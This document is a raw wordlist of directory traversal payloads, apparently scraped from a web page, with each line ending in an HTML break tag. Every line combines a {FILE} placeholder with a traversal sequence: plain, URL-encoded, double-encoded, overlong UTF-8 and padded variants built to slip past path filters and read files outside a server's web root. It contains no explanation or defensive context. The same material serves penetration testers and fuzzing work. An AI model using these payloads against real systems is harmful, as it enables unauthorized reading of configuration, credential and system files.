%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}<br />
..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}<br />
..%%32%66{FILE}<br />
..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}<br />
%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}<br />
..%%35%63{FILE}<br />
..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}<br />
%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}<br />
%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
..%252f{FILE}<br />
..%252f..%252f{FILE}<br />
..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}<br />
%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}<br />
%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}<br />
..\{FILE}<br />
..\..\{FILE}<br />
..\..\..\{FILE}<br />
..\..\..\..\{FILE}<br />
..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\{FILE}<br />
..\..\..\..\..\..\..\..\{FILE}<br />
..%5c{FILE}<br />
..%5c..%5c{FILE}<br />
..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}<br />
%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}<br />
%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..%255c{FILE}<br />
..%255c..%255c{FILE}<br />
..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}<br />
%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}<br />
%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}<br />
../{FILE}<br />
../../{FILE}<br />
../../../{FILE}<br />
../../../../{FILE}<br />
../../../../../{FILE}<br />
../../../../../../{FILE}<br />
../../../../../../../{FILE}<br />
../../../../../../../../{FILE}<br />
..%2f{FILE}<br />
..%2f..%2f{FILE}<br />
..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}<br />
%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}<br />
..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
///%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
\\\%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..//{FILE}<br />
..//..//{FILE}<br />
..//..//..//{FILE}<br />
..//..//..//..//{FILE}<br />
..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//..//{FILE}<br />
..///{FILE}<br />
..///..///{FILE}<br />
..///..///..///{FILE}<br />
..///..///..///..///{FILE}<br />
..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///..///{FILE}<br />
..\\{FILE}<br />
..\\..\\{FILE}<br />
..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\\{FILE}<br />
..\\\..\\\{FILE}<br />
..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
./\/./{FILE}<br />
./\/././\/./{FILE}<br />
./\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
.\/\.\{FILE}<br />
.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}<br />
